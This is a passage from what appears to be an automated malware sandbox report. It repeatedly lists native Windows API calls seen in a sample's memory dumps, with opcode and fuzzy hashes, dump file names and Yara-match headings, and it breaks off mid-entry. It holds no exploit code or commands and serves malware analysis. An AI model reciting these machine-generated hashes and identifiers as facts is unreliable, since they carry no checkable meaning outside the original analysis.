                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 9696386f45df1b40e6d52ff727d5064550613b1301bb2db15cae2250a2c91d46
                                                                                                                                                    • Instruction ID: 06def11213038066eeac111ec7728d04a9ef91c391912f599937c133a03571d0
                                                                                                                                                    • Opcode Fuzzy Hash: 9696386f45df1b40e6d52ff727d5064550613b1301bb2db15cae2250a2c91d46
                                                                                                                                                    • Instruction Fuzzy Hash: 3401AFB2200108AFCB48CF98DC85EEB77A9AF8C354F158649FA0D97251C630E811CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000B820D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction ID: 4cc77bf4c3a707cfc1b1038b6c10a4b6b21f39f96dac97e2db96b941657b0e60
                                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                    • Instruction Fuzzy Hash: 70F0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158648FA0D97241C630E811CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(000B3D52,5E972F59,FFFFFFFF,000B3A11,?,?,000B3D52,?,000B3A11,FFFFFFFF,5E972F59,000B3D52,?,00000000), ref: 000B82B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 3260e962a4630f42a44e30a6ddef4037a7de5e8fdb27dd8d48b4beecf3ce0cf0
                                                                                                                                                    • Instruction ID: bb35e5eedb0659507de255bbcdc62ae3587fa140aacfb45f6db72a2f7c8193f5
                                                                                                                                                    • Opcode Fuzzy Hash: 3260e962a4630f42a44e30a6ddef4037a7de5e8fdb27dd8d48b4beecf3ce0cf0
                                                                                                                                                    • Instruction Fuzzy Hash: CD11F6B6600108AFCB08DF99DC80DEB77ADEF8C354B158649F91DA7212CA30EC11CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000A2D11,00002000,00003000,00000004), ref: 000B83D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 35a99f39f1a6b286e1fd83a508c99e5cec48057c6a6c68c366765ea3f5ba59f1
                                                                                                                                                    • Instruction ID: bb0a3ebe2b995b2e30afca1a18a520b5c10ea20cd9313f2ddc773b4ed42eb507
                                                                                                                                                    • Opcode Fuzzy Hash: 35a99f39f1a6b286e1fd83a508c99e5cec48057c6a6c68c366765ea3f5ba59f1
                                                                                                                                                    • Instruction Fuzzy Hash: B3012DB1200209AFDB14DF98DC85DEB77ADEF88750F158659F90897252DA30E910CBF0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(000B3D52,5E972F59,FFFFFFFF,000B3A11,?,?,000B3D52,?,000B3A11,FFFFFFFF,5E972F59,000B3D52,?,00000000), ref: 000B82B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: e3f653de5db535925df1cd850991d4151c40d09fb8b5198b377e621bfda7a453
                                                                                                                                                    • Instruction ID: 0312d1a37f09f0ac39f6411d100eb048821e066ec09c9b79f06f1ac68ad6f3b2
                                                                                                                                                    • Opcode Fuzzy Hash: e3f653de5db535925df1cd850991d4151c40d09fb8b5198b377e621bfda7a453
                                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F9B6200108AFDB14DF99DC41DEB77ADEF88320F118649FA1D97291DA30E951CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(000B3D52,5E972F59,FFFFFFFF,000B3A11,?,?,000B3D52,?,000B3A11,FFFFFFFF,5E972F59,000B3D52,?,00000000), ref: 000B82B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: c68a5b27e4e9932ae98130ce170a41bacbdbcd91d61ee66fc2edd589f50c7816
                                                                                                                                                    • Instruction ID: b76f90ca3e57e9cb0321e5b0b8b3816836959049a4025fac7a53a71b87f140ff
                                                                                                                                                    • Opcode Fuzzy Hash: c68a5b27e4e9932ae98130ce170a41bacbdbcd91d61ee66fc2edd589f50c7816
                                                                                                                                                    • Instruction Fuzzy Hash: C2F0E2B2200208ABCB04DF98CC91EEB77A9AF8C314F058648BE1D97241CA30EC11CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(000B3D52,5E972F59,FFFFFFFF,000B3A11,?,?,000B3D52,?,000B3A11,FFFFFFFF,5E972F59,000B3D52,?,00000000), ref: 000B82B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                    • Instruction ID: 310d58f476326100ca4d7aafb1f04fcf848e88e50b06bd92e65c3fc67a654b60
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                    • Instruction Fuzzy Hash: 04F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158649BA1D97251DA30E811CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000A2D11,00002000,00003000,00000004), ref: 000B83D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: ddc14858b5d62cf205c54646eb0a08073655958a22d81989dddc4194310687ea
                                                                                                                                                    • Instruction ID: 3e3ecd76a839f7cd7d62d59abd1f191211db4ef24103890adfa1e5e544db683b
                                                                                                                                                    • Opcode Fuzzy Hash: ddc14858b5d62cf205c54646eb0a08073655958a22d81989dddc4194310687ea
                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0D4B6214208ABCB14DF89CC81EE777A9EF8C650F158549FA1997251CA30E911CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000A2D11,00002000,00003000,00000004), ref: 000B83D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(000B3D30,?,?,000B3D30,00000000,FFFFFFFF), ref: 000B8315
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(000B3D30,?,?,000B3D30,00000000,FFFFFFFF), ref: 000B8315
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
